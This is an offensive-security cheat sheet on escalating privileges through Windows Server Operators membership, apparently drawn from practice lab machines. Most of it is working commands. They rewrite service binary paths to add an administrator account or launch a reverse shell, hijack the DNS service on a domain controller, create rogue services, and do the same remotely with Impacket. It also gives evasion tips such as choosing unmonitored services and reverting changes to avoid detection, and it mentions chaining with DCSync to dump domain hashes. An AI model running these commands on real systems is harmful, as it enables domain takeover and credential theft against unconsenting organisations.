Server Operators Abuse
#Overview
The Server Operators group grants members the ability to start, stop, and configure services on domain controllers. This includes modifying service binary paths, which can be leveraged to execute arbitrary code as SYSTEM. On domain controllers, this effectively grants domain admin equivalent privileges.
#Prerequisites
- Membership in the Server Operators group (or equivalent service control permissions)
- Ability to modify service configuration
#Detection & Enumeration
:: Check group membership
whoami /groups | findstr /i "Server"
:: List services and their permissions
sc query state= all
:: Check if you can modify a specific service
accesschk.exe /accepteula -uwcqv "Server Operators" *
:: Check specific service permissions
sc sdshow <ServiceName>
CMD
#Using PowerUp for Service Enumeration
Import-Module .\PowerUp.ps1
Get-ServiceUnquoted
Get-ModifiableService
Get-ModifiableServiceFile
POWERSHELL
#Exploitation / Execution
#Modify Service Binary Path
:: Check current service configuration
sc qc <ServiceName>
:: Modify the service binary path to run a command
sc config <ServiceName> binPath= "cmd.exe /c net user hacker P@ssw0rd! /add && net localgroup Administrators hacker /add"
:: Or use a reverse shell
sc config <ServiceName> binPath= "cmd.exe /c C:\temp\reverse_shell.exe"
:: Start the service to execute
sc start <ServiceName>
:: Revert the service path to original (cleanup)
sc config <ServiceName> binPath= "C:\Original\Path\service.exe"
CMD
#Service-Based Privilege Escalation on DC
:: If Server Operators on a Domain Controller
:: Modify the DNS service (commonly present on DCs)
sc config DNS binPath= "cmd.exe /c C:\temp\reverse_shell.exe"
:: Start the service
sc start DNS
:: Alternative: create a new service
sc create privesc binPath= "C:\temp\reverse_shell.exe" start= demand
sc start privesc
CMD
#Using Service Control from Remote
# Using Impacket's services.py
impacket-services.py 'domain.local/svc_operator:password@10.10.10.10' -action change -name DNS -display "DNS Server" -path "C:\temp\shell.exe"
# Start the service
impacket-services.py 'domain.local/svc_operator:password@10.10.10.10' -action start -name DNS
BASH
#Common Pitfalls
- ⚠️ The service binary path has a 256-character limit — keep payloads short
- ⚠️ Some services restart automatically or are monitored — choose a service that won't attract attention
- ⚠️ Service execution runs in Session 0 (non-interactive) — GUI programs won't display windows
- ⚠️ The
binPath=parameter insc configrequires a space after the equals sign but NOT before it - ⚠️ After exploitation, always revert the service path to its original value to avoid detection
#OPSEC Considerations
- 🛡️ Service configuration changes generate Event ID 7040 (service start type change) and 4697 (service installation)
- 🛡️ Service start generates Event ID 7036 (service state change)
- 🛡️ Modifying a well-known service (like DNS on a DC) may trigger alerts in SIEM
- 🛡️ Creating new services is more suspicious than modifying existing ones
#Post-Exploitation Value
Server Operators on a domain controller provides a direct path to SYSTEM, which on a DC means domain admin equivalent. This can be chained with DCSync to dump all domain hashes.
#Tool References
| Tool | Link |
|---|---|
| PowerUp | https://github.com/PowerShellMafia/PowerSploit |
| accesschk | https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk |
| Impacket services | https://github.com/fortra/impacket |
#Source Machines
- Support (Easy, Windows)
- Flight (Medium, AD/Windows)